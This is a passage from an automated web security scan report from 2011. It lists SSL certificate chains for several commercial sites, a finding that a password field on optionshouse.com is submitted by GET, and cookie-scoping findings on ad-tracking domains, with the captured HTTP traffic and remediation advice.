The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.ooma.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Wed Dec 15 18:00:00 GMT-06:00 2010
Valid to:  Wed Dec 28 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

7.6. https://login.aptela.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.aptela.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.aptela.com
Issued by:  GeoTrust SSL CA
Valid from:  Wed Aug 03 20:56:29 GMT-06:00 2011
Valid to:  Thu Oct 04 22:38:24 GMT-06:00 2012

Certificate chain #1

Issued to:  GeoTrust SSL CA
Issued by:  GeoTrust Global CA
Valid from:  Fri Feb 19 16:39:26 GMT-06:00 2010
Valid to:  Tue Feb 18 16:39:26 GMT-06:00 2020

Certificate chain #2

Issued to:  GeoTrust Global CA
Issued by:  Equifax Secure Certificate Authority
Valid from:  Mon May 20 22:00:00 GMT-06:00 2002
Valid to:  Mon Aug 20 22:00:00 GMT-06:00 2018

Certificate chain #3

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:  Wed Aug 22 10:41:51 GMT-06:00 2018

7.7. https://login.comcast.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.comcast.net
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  login.comcast.net
Issued by:  VeriSign Class 3 Secure Server CA - G2
Valid from:  Tue Jul 27 18:00:00 GMT-06:00 2010
Valid to:  Mon Aug 13 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G2
Issued by:  VeriSign Trust Network
Valid from:  Tue Mar 24 18:00:00 GMT-06:00 2009
Valid to:  Sun Mar 24 17:59:59 GMT-06:00 2019

Certificate chain #2

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 18:00:00 GMT-06:00 1998
Valid to:  Tue Aug 01 17:59:59 GMT-06:00 2028

7.8. https://login.frontier.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.frontier.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  login.frontier.com
Issued by:  GeoTrust DV SSL CA
Valid from:  Sun Dec 05 02:33:26 GMT-06:00 2010
Valid to:  Tue Jan 05 19:09:33 GMT-06:00 2016

Certificate chain #1

Issued to:  GeoTrust DV SSL CA
Issued by:  GeoTrust Global CA
Valid from:  Fri Feb 26 15:32:31 GMT-06:00 2010
Valid to:  Tue Feb 25 15:32:31 GMT-06:00 2020

Certificate chain #2

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 22:00:00 GMT-06:00 2002
Valid to:  Fri May 20 22:00:00 GMT-06:00 2022

7.9. https://login.frontiermobile.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.frontiermobile.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  login.frontiermobile.com
Issued by:  GeoTrust DV SSL CA
Valid from:  Tue Nov 16 22:07:38 GMT-06:00 2010
Valid to:  Wed Jan 01 07:58:06 GMT-06:00 2014

Certificate chain #1

Issued to:  GeoTrust DV SSL CA
Issued by:  GeoTrust Global CA
Valid from:  Fri Feb 26 15:32:31 GMT-06:00 2010
Valid to:  Tue Feb 25 15:32:31 GMT-06:00 2020

Certificate chain #2

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 22:00:00 GMT-06:00 2002
Valid to:  Fri May 20 22:00:00 GMT-06:00 2022

7.10. https://us.etrade.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://us.etrade.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  us.etrade.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Mon Jun 27 18:00:00 GMT-06:00 2011
Valid to:  Wed Jun 27 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

7.11. https://www.comcast.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcast.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.comcast.com
Issued by:  VeriSign Class 3 Secure Server CA - G2
Valid from:  Sun Oct 18 18:00:00 GMT-06:00 2009
Valid to:  Tue Nov 15 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G2
Issued by:  VeriSign Trust Network
Valid from:  Tue Mar 24 18:00:00 GMT-06:00 2009
Valid to:  Sun Mar 24 17:59:59 GMT-06:00 2019

Certificate chain #2

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 18:00:00 GMT-06:00 1998
Valid to:  Tue Aug 01 17:59:59 GMT-06:00 2028

7.12. https://www.fidelity.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fidelity.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.fidelity.com,ST=MASSACHUSETTS
Issued by:  Akamai Subordinate CA 3
Valid from:  Thu Nov 18 08:58:06 GMT-06:00 2010
Valid to:  Fri Nov 18 08:58:06 GMT-06:00 2011

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 09:32:00 GMT-06:00 2006
Valid to:  Sat May 11 17:59:00 GMT-06:00 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 18:29:00 GMT-06:00 1998
Valid to:  Mon Aug 13 17:59:00 GMT-06:00 2018

7.13. https://www.frontiermobile.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.frontiermobile.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.frontiermobile.com
Issued by:  GeoTrust DV SSL CA
Valid from:  Thu Dec 09 03:40:40 GMT-06:00 2010
Valid to:  Sun Jan 10 02:11:54 GMT-06:00 2016

Certificate chain #1

Issued to:  GeoTrust DV SSL CA
Issued by:  GeoTrust Global CA
Valid from:  Fri Feb 26 15:32:31 GMT-06:00 2010
Valid to:  Tue Feb 25 15:32:31 GMT-06:00 2020

Certificate chain #2

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 22:00:00 GMT-06:00 2002
Valid to:  Fri May 20 22:00:00 GMT-06:00 2022

7.14. https://www.optionshouse.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.optionshouse.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.optionshouse.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Thu Dec 30 12:49:32 GMT-06:00 2010
Valid to:  Fri Dec 30 12:49:32 GMT-06:00 2011

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 GMT-06:00 2006
Valid to:  Sun Nov 15 19:54:37 GMT-06:00 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  http://www.valicert.com/
Valid from:  Tue Jun 29 11:06:20 GMT-06:00 2004
Valid to:  Sat Jun 29 11:06:20 GMT-06:00 2024

Certificate chain #3

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 18:19:54 GMT-06:00 1999
Valid to:  Tue Jun 25 18:19:54 GMT-06:00 2019

Certificate chain #4

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 18:19:54 GMT-06:00 1999
Valid to:  Tue Jun 25 18:19:54 GMT-06:00 2019

7.15. https://www.usps.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.usps.com,ST=MINNESOTA
Issued by:  Akamai Subordinate CA 3
Valid from:  Thu Jul 21 06:49:58 GMT-06:00 2011
Valid to:  Sat Jul 21 06:49:58 GMT-06:00 2012

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 09:32:00 GMT-06:00 2006
Valid to:  Sat May 11 17:59:00 GMT-06:00 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 18:29:00 GMT-06:00 1998
Valid to:  Mon Aug 13 17:59:00 GMT-06:00 2018

8. Password field submitted using GET method

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.optionshouse.com
Path:   /tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password fields:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET /tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp HTTP/1.1
Host: www.optionshouse.com
Connection: keep-alive
Referer: http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/?utm_source=yhofin&utm_medium=paid-banner-ads&utm_campaign=120x60-QuotesBttn&utm_content=stock:oldGrnBlk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LiveBall=uid=699982&uky=G2W1TS8H&rid=764602

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 06 Sep 2011 12:49:02 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 19900


<!DOCTYPE html
   PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
...[SNIP]...
</div>

       <form data-actions="[
           {
               action: 'validator',
               triggerEvent: 'validate'
           },
           {
               action: 'removeNonVisibleFormFields',
               triggerEvent: 'handleNonVisibleFormFields',
               fieldNamesToSkip: [
                   'login.userName',
                   'login.password',
                   'login.passwordConfirm',
                   'login.securityQuestion',
                   'login.securityAnswer'
               ]
           },
           {
               action: 'createLogin',
               triggerEvent: 'loginCreate'
           },
           {
               action: 'contextualHelp'
           },
           {
               action: 'controller',
               beforeSubmitEvents: [ 'validate', 'handleNonVisibleFormFields', 'loginCreate' ],
               skipApplicationFind: true,
               skipHandleNonVisibleFormFields: true
           }
       ]">


       <fieldset class="textGroup">
...[SNIP]...
</label>
   
                       <input type="password" class="text large" id="password" name="login.password" minlength="6" maxlength="20" />
   
                       <div class="help">
...[SNIP]...
</label>
                       <input type="password" class="text large" id="passwordConfirm" name="login.passwordConfirm" minlength="6" maxlength="20" />
                        <div class="help">
...[SNIP]...

9. Cookie scoped to parent domain
There are 52 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


9.1. http://pixel.everesttech.net/2565/c

Summary

Severity:   Low
Confidence:   Firm
Host:   http://pixel.everesttech.net
Path:   /2565/c

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2565/c?ev_ct=d&ev_sid=54&ev_ci=1660002714&ev_ai=1660082513&ev_cri=1660643811&url=http%3A//landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/%3Futm_source%3Dyhofin%26utm_medium%3Dpaid-banner-ads%26utm_campaign%3D120x60-QuotesBttn%26utm_content%3Dstock%3AoldGrnBlk HTTP/1.1
Host: pixel.everesttech.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*;ord=1315313295039208?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gglck=zqROZUBXyFQAAIdR; everest_session_v2=AXNOZhaIGXMAAIM3; everest_g_v2=g_surferid~zqROZUBXyFQAAIdR

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:48:34 GMT
Server: Apache
Set-Cookie: everest_session_v2=AXNOZhaIGXMAAIM3; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~zqROZUBXyFQAAIdR; path=/; domain=.everesttech.net; expires=Tue, 10-Sep-2030 23:28:34 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache
Location: http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/?utm_source=yhofin&utm_medium=paid-banner-ads&utm_campaign=120x60-QuotesBttn&utm_content=stock:oldGrnBlk
Content-Length: 364
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://landing.optionshouse.com/rate/395/yhofin
...[SNIP]...

9.2. http://pixel.everesttech.net/2565/i

Summary

Severity:   Low
Confidence:   Firm
Host:   http://pixel.everesttech.net
Path:   /2565/i

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2565/i?ev_sid=54&ev_ci=1660002714&ev_ai=1660082513&ev_cri=1660643811 HTTP/1.1
Host: pixel.everesttech.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15uql37a6/M=601454399.602194378.673385551.687570551/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=n9rGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=2892168919546073312/R=1/X=3/*;ord=1315313286070877?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gglck=zqROZUBXyFQAAIdR; everest_g_v2=g_surferid~zqROZUBXyFQAAIdR

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:09 GMT
Server: Apache
Set-Cookie: everest_session_v2=AXNOZhaIGXMAAIM3; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~zqROZUBXyFQAAIdR; path=/; domain=.everesttech.net; expires=Tue, 10-Sep-2030 23:28:09 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache
Vary: X-EF-Forwarded-For,Cookie,Host
Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT
ETag: "2051142-80-49f19eb07d340"
Accept-Ranges: bytes
Content-Length: 128
Content-Type: image/png

.PNG
.
...IHDR.....................bKGD.............    pHYs...........~.....tIME......).......IDATx.c````........E@....IEND.B`.

9.3. http://40.xg4ken.com/media/redir.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://40.xg4ken.com
Path:   /media/redir.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/redir.php?prof=85&camp=2140&affcode=kw94444&cid=13569521491&networkType=search&url[]=http%3A%2F%2Fwww.whitefence.com%2Fcategory%2Fhome-phone%2F HTTP/1.1
Host: 40.xg4ken.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:51:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564; expires=Mon, 05-Dec-2011 11:51:52 GMT; path=/; domain=.xg4ken.com
Location: http://www.whitefence.com/category/home-phone/
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


9.4. http://ad.agkn.com/iframe!t=1129!

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1129!

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:49 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=""; Version=1; Domain=.agkn.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 722
Date: Tue, 06 Sep 2011 12:45:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...

9.5. http://ad.agkn.com/iframe!t=1131!

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:44:56 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 721
Date: Tue, 06 Sep 2011 12:44:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...

9.6. http://ads.lucidmedia.com/clicksense/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.lucidmedia.com
Path:   /clicksense/pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clicksense/pixel?id=100842&t=s HTTP/1.1
Host: ads.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://www.ooma.com/premier
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 11:59:02 GMT
Expires: Tue, 06 Sep 2011 11:59:03 GMT
P3P: CP="NOI ADM DEV CUR"
X-Handled-By: awswrh19/127.0.0.1
Set-Cookie: 2=38yalGDMfLj; Domain=.lucidmedia.com; Expires=Wed, 05-Sep-2012 11:59:03 GMT; Path=/
Content-Type: text/javascript
Content-Length: 0
Connection: close


9.7. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

